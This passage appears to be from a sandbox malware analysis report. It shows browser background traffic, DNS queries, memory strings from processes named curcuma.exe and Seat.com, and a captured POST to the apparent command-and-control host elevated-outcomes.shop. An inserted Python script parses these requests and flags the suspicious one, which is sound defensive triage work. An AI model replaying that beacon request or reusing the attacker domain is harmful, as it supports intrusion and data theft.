                      Connection: keep-alive
                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-viewport-height: 876
                      sec-ch-ua-arch: "x86"
                      sec-ch-viewport-width: 1232
                      sec-ch-ua-platform-version: "10.0.0"
                      downlink: 1.45
                      sec-ch-ua-bitness: "64"
                      sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.55", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150"
                      sec-ch-ua-model: ""
                      sec-ch-prefers-color-scheme: light
                      sec-ch-ua-platform: "Windows"
                      device-memory: 8
                      rtt: 400
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                      sec-ch-ua-full-version: "117.0.2045.55"
                      sec-ch-dpr: 1
                      ect: 3g
                      Accept: */*
                      sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: same-origin
                      Sec-Fetch-Dest: worker
                      Referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=674E66C55A9344F481D3165612FD20C7.RefC=2025-03-07T16:34:43Z; USRLOC=; MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; MUIDB=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; _EDGE_S=F=1&SID=3B3F921E4B7A6BB111A987B64AE56A98; _EDGE_V=1
                  Source: global traffic HTTP traffic detected:
                      GET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1
                      Host: clients2.googleusercontent.com
                      Connection: keep-alive
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global traffic HTTP traffic detected:
                      GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1
                      Host: apis.google.com
                      Connection: keep-alive
                      sec-ch-ua-platform: "Windows"
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                      sec-ch-ua-mobile: ?0
                      Accept: */*
                      X-Client-Data: CO6MywE=
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: script
                      Sec-Fetch-Storage-Access: active
                      Accept-Encoding: gzip, deflate, br, zstd
                      Accept-Language: en-US,en;q=0.9
                  Source: global traffic HTTP traffic detected:
                      GET /bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js HTTP/1.1
                      Host: assets.msn.com
                      Connection: keep-alive
                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      Origin: https://ntp.msn.com
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                      sec-ch-ua-platform: "Windows"
                      Accept: */*
                      Sec-Fetch-Site: same-site
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: script
                      Referer: https://ntp.msn.com/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.4fa8815283fe3d88a934.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.005fa5d1a45c7a2d7a6d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /b?rn=1741365293756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3B61B35AD2B06E2C0F4DA6F2D3A26FDA&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1741365293756&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=674e66c55a9344f481d3165612fd20c7&activityId=674e66c55a9344f481d3165612fd20c7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; _EDGE_S=F=1&SID=3B3F921E4B7A6BB111A987B64AE56A98; _EDGE_V=1
                  Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":32,"imageId":"BB1msKSh","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=674E66C55A9344F481D3165612FD20C7.RefC=2025-03-07T16:34:43Z; USRLOC=; MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; MUIDB=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; _EDGE_S=F=1&SID=3B3F921E4B7A6BB111A987B64AE56A98; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5e179a97-9338-40a1-9cc0-c38de61b5afc; ai_session=Ff3ogpzhHg3GNTwS9HR/cu|1741365293750|1741365293750; 
sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=674E66C55A9344F481D3165612FD20C7.RefC=2025-03-07T16:34:43Z
                  Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.45sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.55", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 550sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-full-version: "117.0.2045.55"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=674E66C55A9344F481D3165612FD20C7.RefC=2025-03-07T16:34:43Z; USRLOC=; MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; MUIDB=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; _EDGE_S=F=1&SID=3B3F921E4B7A6BB111A987B64AE56A98; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5e179a97-9338-40a1-9cc0-c38de61b5afc; 
ai_session=Ff3ogpzhHg3GNTwS9HR/cu|1741365293750|1741365293750; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=674E66C55A9344F481D3165612FD20C7.RefC=2025-03-07T16:34:43Z
                  Source: global trafficHTTP traffic detected: GET /b2?rn=1741365293756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3B61B35AD2B06E2C0F4DA6F2D3A26FDA&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1BAe235586880830cfcd1a51741365297; XID=1BAe235586880830cfcd1a51741365297
                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1741365293756&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=674e66c55a9344f481d3165612fd20c7&activityId=674e66c55a9344f481d3165612fd20c7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=9F3114AF064146BD91581B50BBBDD238&MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; _EDGE_S=F=1&SID=3B3F921E4B7A6BB111A987B64AE56A98; _EDGE_V=1; SM=T; msnup=%7B%22cnex%22%3A%22no%22%7D
                  Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                  Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.facebook.comn\ t equals www.facebook.com (Facebook)
Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.youtube.com I equals www.youtube.com (Youtube)
Source: curcuma.exe, 00000024.00000003.2420129542.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: / tHyI5foKXl6Izt4OLqkzqV5mufPSMUKbhwKsIRGr5Bs=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/t&fg=1 equals www.youtube.com (Youtube)
Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: @www.facebook.comn\ t equals www.facebook.com (Facebook)
Source: curcuma.exe, 00000024.00000003.2420129542.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: HyI5foKXl6Izt4OLqkzqV5mufPSMUKbhwKsIRGr5Bs=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: `www.youtube.com equals www.youtube.com (Youtube)
Source: curcuma.exe, 00000024.00000003.2420129542.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: rc 'nonce-BHyI5foKXl6Izt4OLqkzqV5mufPSMUKbhwKsIRGr5Bs=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: ZuYwLYOGpsYmohRivNRzySjfrEDfR.ZuYwLYOGpsYmohRivNRzySjfrEDfR
Source: global traffic | DNS traffic detected: DNS query: elevated-outcomes.shop
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic | DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic | DNS traffic detected: DNS query: apis.google.com
Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic | DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic | DNS traffic detected: DNS query: c.msn.com
Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
Source: global traffic | DNS traffic detected: DNS query: api.msn.com
Source: global traffic | DNS traffic detected: DNS query: play.google.com
Source: unknown | HTTP traffic detected:
    POST /NTIyOTQ3Mw?ihaigqg=S77l%2BqQIqU5Z8Of519CEd47wpU8km8qz4lAsqKSDbJbV88cNCbNkQ5co2yv9Yi3V%2B4UngeF2wrQ9x0YVDwI%2Fnw%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
    Content-Length: 147
    Host: elevated-outcomes.shop
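The POST above is the one request in this section that the report attributes to an unknown source rather than to the sandbox's own Edge browser or to Windows CryptoAPI, and its Host is the second DNS query listed. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it re-splits the flattened request strings the report prints into request line and headers, then applies the checks an analyst would run over them before reading the rest of the indicators. The expected-host list is taken from the hosts that appear in this section; the header-order heuristic (the .NET Framework HttpWebRequest stack sends "Connection: Keep-Alive" and places Host last, while Chromium sends Host first with lower-case keep-alive and attaches Sec-Fetch-* metadata to its HTTPS requests) is an assumption of this example, not a report finding. The example also base64-decodes the first path segment, which the report itself does not interpret.

```python
"""Triage of the raw HTTP requests printed in this report section.

Added example, not code from the Joe Sandbox report or from the sample.
The report prints each request on one line with the header breaks lost,
so parse_request() re-splits on the header names that occur in the report.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Header names that occur in the report's requests (extend for other reports).
HEADER_NAMES = [
    "Host", "Connection", "Cache-Control", "Accept", "Accept-Encoding",
    "Accept-Language", "User-Agent", "Content-Length", "Cookie", "Origin",
    "Referer", "If-Modified-Since", "Sec-Fetch-Site", "Sec-Fetch-Mode",
    "Sec-Fetch-Dest", "sec-ch-ua", "sec-ch-ua-mobile", "sec-ch-ua-platform",
]
_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, HEADER_NAMES)))

# Hosts this section attributes to the sandbox's Edge browser and to Windows
# CryptoAPI; traffic to them is background noise, not sample behaviour.
EXPECTED_HOST_SUFFIXES = ("msn.com", "google.com", "googleusercontent.com",
                          "scorecardresearch.com", "c.pki.goog")

# Copied from the report's "HTTP traffic detected" lines, flattened as printed.
C2_POST = (
    "POST /NTIyOTQ3Mw?ihaigqg=S77l%2BqQIqU5Z8Of519CEd47wpU8km8qz4lAsqKSDbJbV88cNCbNkQ5co2yv9Yi3V"
    "%2B4UngeF2wrQ9x0YVDwI%2Fnw%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/123.0.0.0 Safari/537.36Content-Length: 147Host: elevated-outcomes.shop")
CRYPTOAPI_GET = (
    "GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*"
    "If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog")
# Constructed: a trimmed subset of the headers of one Edge new-tab-page request.
EDGE_GET = (
    "GET /statics/icons/favicon.ico HTTP/1.1Host: assets.msn.comConnection: keep-alive"
    "sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55"
    "Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: image")


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)  # lower-cased names
    order: List[str] = field(default_factory=list)         # names in the order sent


def parse_request(raw: str) -> Request:
    """Parse a request given either with real line breaks or flattened."""
    pieces = [p for chunk in _SPLIT.split(raw.replace("\r\n", "\n"))
              for p in chunk.split("\n") if p]
    method, path, _version = pieces[0].split(" ", 2)
    req = Request(method, path)
    for line in pieces[1:]:
        name, _, value = line.partition(": ")
        req.headers[name.lower()] = value
        req.order.append(name)
    return req


def host_is_expected(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in EXPECTED_HOST_SUFFIXES)


def nonbrowser_header_profile(req: Request) -> bool:
    """Assumption (heuristic, not a report finding): Chromium sends Host first and
    'Connection: keep-alive' in lower case; the .NET Framework HttpWebRequest stack
    sends 'Connection: Keep-Alive' and puts Host last. Order is evidence, not proof."""
    return req.headers.get("connection") == "Keep-Alive" and req.order[-1:] == ["Host"]


def decode_path_token(token: str) -> Optional[str]:
    """Base64-decode a URL path segment if the result is printable ASCII, else None."""
    try:
        data = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError: bad alphabet or padding
        return None
    if data and all(0x20 <= b < 0x7F for b in data):
        return data.decode("ascii")
    return None


def triage(raw: str) -> dict:
    """Summarise one request and list the indicators that make it worth a look."""
    req = parse_request(raw)
    host = req.headers.get("host", "")
    ua = req.headers.get("user-agent", "")
    flags = []
    if not host_is_expected(host):
        flags.append("unexpected-host")
    if req.method == "POST" and "content-length" in req.headers:
        flags.append("post-with-body")
    if "Chrome/" in ua and nonbrowser_header_profile(req):
        flags.append("browser-ua-nonbrowser-headers")
    if "Chrome/" in ua and "sec-fetch-site" not in req.headers:
        flags.append("missing-fetch-metadata")  # Chromium adds Sec-Fetch-* itself
    first_segment = urlsplit(req.path).path.strip("/").split("/")[0]
    return {"method": req.method, "host": host, "path": req.path,
            "decoded_path": decode_path_token(first_segment), "flags": flags}


if __name__ == "__main__":
    for raw in (C2_POST, CRYPTOAPI_GET, EDGE_GET):
        print(triage(raw))
```

Run as written, the POST comes back with host elevated-outcomes.shop, the path segment decoded to 5229473 and all four flags raised, while the CryptoAPI and Edge requests raise none; that is the separation an analyst wants before working through the string and URL indicators that follow.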
Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
